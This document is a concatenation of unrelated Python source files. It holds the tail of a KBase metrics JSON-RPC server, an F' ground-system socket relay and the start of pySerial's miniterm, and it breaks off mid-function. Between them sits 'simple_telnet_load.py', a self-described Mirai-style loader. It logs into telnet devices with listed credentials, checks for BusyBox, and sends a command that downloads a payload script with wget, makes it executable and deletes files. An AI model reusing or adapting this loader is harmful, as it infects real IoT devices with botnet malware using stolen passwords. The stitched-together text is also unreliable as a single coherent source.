self.rpc_service.add(impl_kb_Metrics.query_jobs_admin,
name='kb_Metrics.query_jobs_admin',
types=[dict])
self.method_authentication['kb_Metrics.query_jobs_admin'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_job,
name='kb_Metrics.get_job',
types=[dict])
self.method_authentication['kb_Metrics.get_job'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.map_ws_narrative_names,
name='kb_Metrics.map_ws_narrative_names',
types=[list])
self.method_authentication['kb_Metrics.map_ws_narrative_names'] = 'optional' # noqa
self.rpc_service.add(impl_kb_Metrics.update_metrics,
name='kb_Metrics.update_metrics',
types=[dict])
self.method_authentication['kb_Metrics.update_metrics'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_user_details,
name='kb_Metrics.get_user_details',
types=[dict])
self.method_authentication['kb_Metrics.get_user_details'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_nonkbuser_details,
name='kb_Metrics.get_nonkbuser_details',
types=[dict])
self.method_authentication['kb_Metrics.get_nonkbuser_details'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_signup_returning_users,
name='kb_Metrics.get_signup_returning_users',
types=[dict])
self.method_authentication['kb_Metrics.get_signup_returning_users'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_signup_returning_nonkbusers,
name='kb_Metrics.get_signup_returning_nonkbusers',
types=[dict])
self.method_authentication['kb_Metrics.get_signup_returning_nonkbusers'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_user_counts_per_day,
name='kb_Metrics.get_user_counts_per_day',
types=[dict])
self.method_authentication['kb_Metrics.get_user_counts_per_day'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_total_logins,
name='kb_Metrics.get_total_logins',
types=[dict])
self.method_authentication['kb_Metrics.get_total_logins'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_nonkb_total_logins,
name='kb_Metrics.get_nonkb_total_logins',
types=[dict])
self.method_authentication['kb_Metrics.get_nonkb_total_logins'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_user_logins,
name='kb_Metrics.get_user_logins',
types=[dict])
self.method_authentication['kb_Metrics.get_user_logins'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_user_numObjs,
name='kb_Metrics.get_user_numObjs',
types=[dict])
self.method_authentication['kb_Metrics.get_user_numObjs'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_narrative_stats,
name='kb_Metrics.get_narrative_stats',
types=[dict])
self.method_authentication['kb_Metrics.get_narrative_stats'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_all_narrative_stats,
name='kb_Metrics.get_all_narrative_stats',
types=[dict])
self.method_authentication['kb_Metrics.get_all_narrative_stats'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_user_ws_stats,
name='kb_Metrics.get_user_ws_stats',
types=[dict])
self.method_authentication['kb_Metrics.get_user_ws_stats'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.is_admin,
name='kb_Metrics.is_admin',
types=[dict])
self.method_authentication['kb_Metrics.is_admin'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.status,
name='kb_Metrics.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_Metrics ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
tcpserver.py | #!/usr/bin/env python3
from __future__ import print_function
import socket
import threading
try:
import queue
import socketserver
except ImportError:
import Queue as queue
import SocketServer as socketserver
import time
import os
import signal
import sys
import struct
import select
import multiprocessing
import errno
import time
import logging
from fprime.constants import DATA_ENCODING
from fprime.common.models.serialize.type_base import *
from optparse import OptionParser
__version__ = 0.1
__date__ = '2015-04-03'
__updated__ = '2016-04-07'
# Universal server id global
SERVER = None
LOCK = None
shutdown_event = threading.Event()
FSW_clients = []
GUI_clients = []
FSW_ids = []
GUI_ids = []
def signal_handler(signal, frame):
print("Ctrl-C received, server shutting down.")
shutdown_event.set()
def now():
return time.ctime(time.time())
class ThreadedTCPRequestHandler(socketserver.StreamRequestHandler):
"""
Derived from original Stable demo during R&TD and adapted
for use in new FSW gse.py applicaiton.
TCP socket server for commands, log events, and telemetry data.
Later this will handle other things such as sequence files and parameters.
Handle is instanced in own thread for each client.
Registration is done by sending the string "Register <name>".
Sending a message to destination <name> is done as
"A5A5 <name> <data>" Note only <data> is sent.
Any client that sends a "List" comment makes the server display all
registered clients.
"""
socketserver.StreamRequestHandler.allow_reuse_address = True
socketserver.StreamRequestHandler.timeout = 1
def handle(self): # on each client connect
"""
The function that is invoked upon a new client. This function listens
for data on the socket. Packets for now are assumed to be separated
by a newline. For each packet, call processPkt.
"""
self.partial = b''
self.cmdQueue = []
self.registered = False
self.name = b''
self.id = 0
#print self.client_address, now() # show this client's address
# Read the data from the socket
data = self.recv(13)
# Connection was closed by the client
if not data:
print("Client exited.")
return
else:
# Process the data into the cmdQueue
self.getCmds(data)
# Process the cmdQueue
self.processQueue()
if self.registered:
print("Registration complete waiting for message.")
self.getNewMsg()
else:
print("Unable to register client.")
return
LOCK.acquire()
del SERVER.dest_obj[self.name]
if self.name in FSW_clients:
FSW_clients.remove(self.name)
FSW_ids.remove(self.id)
elif self.name in GUI_clients:
GUI_clients.remove(self.name)
GUI_ids.remove(self.id)
LOCK.release()
print("Closed %s connection." % self.name.decode(DATA_ENCODING))
self.registered = False
self.request.close()
def getCmds(self, inputString, end_of_command=b'\n'):
"""
Build a command from partial or full socket input
"""
commands = inputString.split(end_of_command)
if len(self.partial):
commands[0] = self.partial + commands[0]
self.partial = b''
if len(commands[-1]):
self.partial = commands[-1]
self.cmdQueue.extend(commands[:-1])
else:
self.cmdQueue.extend(commands[:-1])
def processQueue(self):
for cmd in self.cmdQueue:
self.processRegistration(cmd)
self.cmdQueue = []
def processRegistration(self, cmd):
params = cmd.split()
id = 0
if params[0] == b'Register':
LOCK.acquire()
name = params[1]
if b'FSW' in name:
if FSW_clients:
id = sorted(FSW_ids)[-1] + 1
name = params[1] + b'_' + bytes(id)
FSW_clients.append(name)
FSW_ids.append(id)
elif b'GUI' in name:
if GUI_clients:
id = sorted(GUI_ids)[-1] + 1
name = params[1] + b'_' + bytes(id)
GUI_clients.append(name)
GUI_ids.append(id)
SERVER.dest_obj[name] = DestObj(name, self.request)
LOCK.release()
self.registered = True
self.name = name
self.id = id
print("Registered client " + self.name.decode(DATA_ENCODING))
#################################################
# New Routines to process the command messages
#################################################
def getNewMsg(self):
"""
After registration wait for an incoming message
The first part must always be an "A5A5 " or a "List "
"""
# Loop while the connected client has packets to send/receive
while not shutdown_event.is_set():
# Read the header data from the socket either A5A5 or List
header = self.readHeader()
#If the received header is an empty string, connection closed, exit loop
if not header:
break
elif header == b"Quit":
LOCK.acquire()
print("Quit received!")
SERVER.dest_obj[self.name].put(struct.pack(">I", 0xA5A5A5A5))
shutdown_event.set()
time.sleep(1)
print("Quit processed!")
SERVER.shutdown()
SERVER.server_close()
LOCK.release()
break
# Got the header data so read the data of the message here...
data = self.readData(header)
# Process and send the packet of the message here...
self.processNewPkt(header, data)
def recv(self, l):
"""
Read l bytes from socket.
"""
chunk = b''
msg = b""
n = 0
while l > n:
try:
chunk = self.request.recv(l-n)
if chunk == b'':
print("read data from socket is empty!")
return b''
msg = msg + chunk
n = len(msg)
except socket.timeout:
if shutdown_event.is_set():
print("socket timed out and shutdown is requested")
return b"Quit\n"
continue
except socket.error as err:
if err.errno == errno.ECONNRESET:
print("Socket error " + str(err.errno) + " (Connection reset by peer) occurred on recv().")
else:
print("Socket error " + str(err.errno) + " occurred on recv().")
return msg
def readHeader(self):
"""
Read the 9 byte header (e.g. "A5A5 GUI " or "A5A5 FSW "),
or just read the "List\n" command.
"""
header = self.recv(5)
if len(header) == 0:
print("Header information is empty, client " + self.name.decode(DATA_ENCODING) + " exiting.")
return header
if header == b"List\n":
return b"List"
elif header == b"Quit\n":
return b"Quit"
elif header[:-1] == b"A5A5":
header2 = self.recv(4)
return (header + header2)
else:
return
def readData(self,header):
"""
Read the data part of the message sent to either GUI or FSW.
GUI receives telemetry.
FSW receives commands of various lengths.
"""
data = b""
if header == b"List":
return b""
elif header == b"Quit":
return b""
dst = header.split(b" ")[1].strip(b" ")
if dst == b"FSW":
# Read variable length command data here...
desc = self.recv(4)
sizeb = self.recv(4)
size = struct.unpack(">I", sizeb)[0]
data = desc + sizeb + self.recv(size)
elif dst == b"GUI":
# Read telemetry data here...
tlm_packet_size = self.recv(4)
size = struct.unpack(">I", tlm_packet_size)[0]
data = tlm_packet_size + self.recv(size)
else:
raise RuntimeError("unrecognized client %s"%dst.decode(DATA_ENCODING))
return data
def processNewPkt(self,header,data):
"""
Process a single command here header and data here.
The command must always start with A5A5 except if it is a List.
Once the entire header tstring is processed send it on queue.
If something goes wrong report and shutdown server.
"""
dest_list = []
if header == b"List":
print("List of registered clients: ")
LOCK.acquire()
for d in list(SERVER.dest_obj.keys()):
print("\t" + SERVER.dest_obj[d].name.decode(DATA_ENCODING))
reg_client_str = b"List " + SERVER.dest_obj[d].name
l = len(reg_client_str)
reg_client_str = struct.pack("i%ds" % l, l,reg_client_str)
self.request.send(reg_client_str)
LOCK.release()
return 0
# Process data here...
head, dst = header.strip(b" ").split(b" ")
if head == b'A5A5': # Packet Header
#print "Received Packet: %s %s...\n" % (head,dst)
if data == b'':
print(" Data is empty, returning.")
if b'GUI' in dst:
dest_list = GUI_clients
elif b'FSW' in dst:
dest_list = FSW_clients
for dest_elem in dest_list:
#print "Locking TCP"
LOCK.acquire()
if dest_elem in list(SERVER.dest_obj.keys()):
# Send the message here....
#print "Sending TCP msg to ", dest_elem
SERVER.dest_obj[dest_elem].put(data)
LOCK.release()
else:
raise RuntimeError("Packet missing A5A5 header")
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler):
"""
Derived from original Stable demo during R&TD and adapted
for use in new FSW gse.py applicaiton.
TCP socket server for commands, log events, and telemetry data.
Later this will handle other things such as sequence files and parameters.
Handle is instanced in own thread for each client.
Registration is done by sending the string "Register <name>".
Sending a message to destination <name> is done as
"A5A5 <name> <data>" Note only <data> is sent.
Any client that sends a "List" comment makes the server display all
registered clients.
"""
socketserver.BaseRequestHandler.allow_reuse_address = True
def handle(self): # on each packet
"""
The function that is invoked when a packet is received. This function listens
for data on the socket. Packets for now are assumed to be separated
by a newline. For each packet, call processPkt.
"""
self.getNewMsg(self.request[0])
#################################################
# New Routines to process the command messages
#################################################
def getNewMsg(self,packet):
"""
After registration wait for an incoming message
The first part must always be an "A5A5 " or a "List "
"""
# Read the header data from the socket either A5A5 or List
(header,packet) = self.readHeader(packet)
#If the received header is an empty string, connection closed, exit loop
if not header:
return
# Got the header data so read the data of the message here...
data = self.readData(header,packet)
# Process and send the packet of the message here...
self.processNewPkt(header, data)
def readHeader(self, packet):
"""
Read the 9 byte header (e.g. "A5A5 GUI " or "A5A5 FSW "),
or just read the "List\n" command.
"""
header = packet[:4]
header2 = packet[4:9]
packet = packet[9:]
return (header + header2,packet)
def readData(self,header,packet):
"""
Read the data part of the message sent to either GUI or FSW.
GUI receives telemetry.
FSW receives commands of various lengths.
"""
data = ""
dst = header.split(b" ")[1].strip(b" ")
# Read telemetry data here...
tlm_packet_size = packet[:4]
size = struct.unpack(">I", tlm_packet_size)[0]
data = tlm_packet_size + packet[4:4+size]
return data
def processNewPkt(self,header,data):
"""
Process a single command here header and data here.
The command must always start with A5A5 except if it is a List.
Once the entire header string is processed send it on queue.
If something goes wrong report and shutdown server.
"""
dest_list = []
# Process data here...
head, dst = header.strip(b" ").split(b" ")
if head == b'A5A5': # Packet Header
#print "Received Packet: %s %s...\n" % (head,dst)
if data == '':
print(" Data is empty, returning.")
if b'GUI' in dst:
dest_list = GUI_clients
else:
print("dest? %s"%dst.decode(DATA_ENCODING))
for dest_elem in dest_list:
LOCK.acquire()
if dest_elem in list(SERVER.dest_obj.keys()):
# Send the message here....
#print "Sending UDP msg to ", dest_elem
SERVER.dest_obj[dest_elem].put(data)
LOCK.release()
else:
raise RuntimeError("Telemetry missing A5A5 header")
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
"""
TCP Socket server.
Keep a dictionary of destination objects containing queues and
socket id's for writting to destinations.
"""
dest_obj = dict()
lock_obj = threading.Lock()
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
"""
UDP Socket server.
"""
class DestObj:
"""
Destination object for all clients registered.
"""
def __init__(self, name, request):
"""
Constructor
"""
self.name = name
self.socket = request
self.packet = b""
def put(self, msg):
"""
Write out the message to the destination socket
"""
try:
#print "about to send data to " + self.name
self.socket.send(msg);
except socket.error as err:
print("Socket error " + str(err.errno) + " occurred on send().")
def fileno(self):
"""
"""
return self.socket
def main(argv=None):
global SERVER, LOCK
program_name = os.path.basename(sys.argv[0])
program_license = "Copyright 2015 user_name (California Institute of Technology) \
ALL RIGHTS RESERVED. U.S. Government Sponsorship acknowledged."
program_version = "v0.1"
program_build_date = "%s" % __updated__
program_version_string = '%%prog %s (%s)' % (program_version, program_build_date)
program_longdesc = '''''' # optional - give further explanation about what the program does
if argv is None:
argv = sys.argv[1:]
try:
parser = OptionParser(version=program_version_string, epilog=program_longdesc, description=program_license)
parser.add_option("-p", "--port", dest="port", action="store", type="int", help="Set threaded tcp socket server port [default: %default]", \
default=50007)
parser.add_option("-i", "--host", dest="host", action="store", type="string", help="Set threaded tcp socket server ip [default: %default]", \
default="127.0.0.1")
# process options
(opts, args) = parser.parse_args(argv)
HOST = opts.host
PORT = opts.port
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
udp_server = ThreadedUDPServer((HOST, PORT), ThreadedUDPRequestHandler)
# Hopefully this will allow address reuse and server to restart immediately
server.allow_reuse_address = True
SERVER = server
LOCK = server.lock_obj
ip, port = server.server_address
print("TCP Socket Server listening on host addr %s, port %s" % (HOST, PORT))
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
udp_server_thread = threading.Thread(target=udp_server.serve_forever)
signal.signal(signal.SIGINT, signal_handler)
server_thread.daemon = False
server_thread.start()
udp_server_thread.daemon = False
udp_server_thread.start()
p = os.getpid()
#print "Process ID: %s" % p
while not shutdown_event.is_set():
server_thread.join(timeout = 5.0)
udp_server_thread.join(timeout = 5.0)
print("shutdown from main thread")
SERVER.shutdown()
SERVER.server_close()
udp_server.shutdown()
udp_server.server_close()
time.sleep(1)
except Exception as e:
indent = len(program_name) * " "
sys.stderr.write(program_name + ": " + repr(e) + "\n")
sys.stderr.write(indent + " for help use --help\n")
return 2
if __name__ == "__main__":
sys.exit(main())
|
simple_telnet_load.py | #!/usr/bin/python
# Telnet loader | have fun Yo! This Loads Mostly BuZy BoXeS regulr format/Mirai.
# You Can Find Fresh TELNET List To Load @ http://godz56.tk/telnet-list/
# Simple Telnet Loader Ya d1g?
import sys, re, os, socket, time
from multiprocessing import Process
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [list]")
cmd="cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://0.0.0.0/bins.sh; chmod 777 bins.sh; rm -rf *" #command to send
info = open(str(sys.argv[1]),'a+')
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
def infect(ip,username,password):
ip = str(ip).rstrip("\n")
username = username.rstrip("\n")
password = password.rstrip("\n")
try:
tn = socket.socket()
tn.settimeout(10)
tn.connect((ip,23))
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "ogin")
if "ogin" in hoho:
tn.send(username + "\n")
time.sleep(0.09)
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "assword:")
if "assword" in hoho:
tn.send(password + "\n")
time.sleep(0.8)
else:
pass
except Exception:
tn.close()
try:
prompt = ''
prompt += tn.recv(40960)
if ">" in prompt and "ONT" not in prompt:
try:
success = False
tn.send("cat | sh" + "\n")
time.sleep(0.1)
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
try:
success = False
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("shell" + "\n")
time.sleep(0.01)
tn.send("help" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
else:
tn.close()
if success == True:
try:
tn.send(cmd + "\n")
print "\033[32m[\033[31m+\033[32m] \033[33mCommand Sent!\033[32m %s"%(ip)
time.sleep(20)
tn.close()
except:
tn.close()
tn.close()
except Exception:
tn.close()
for x in info:
try:
if ":23 " in x:
x = x.replace(":23 ", ":")
xinfo = x.split(":")
session = Process(target=infect, args=(xinfo[0].rstrip("\n"),xinfo[1].rstrip("\n"),xinfo[2].rstrip("\n"),))
session.start()
ip=xinfo[0]
username=xinfo[1]
password=xinfo[2]
time.sleep(0.01)
except:
pass
session.join() |
miniterm.py | #!/home/aakanksha/Blockchain-ERP-interoperability/odoo-13.0/venv/bin/python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
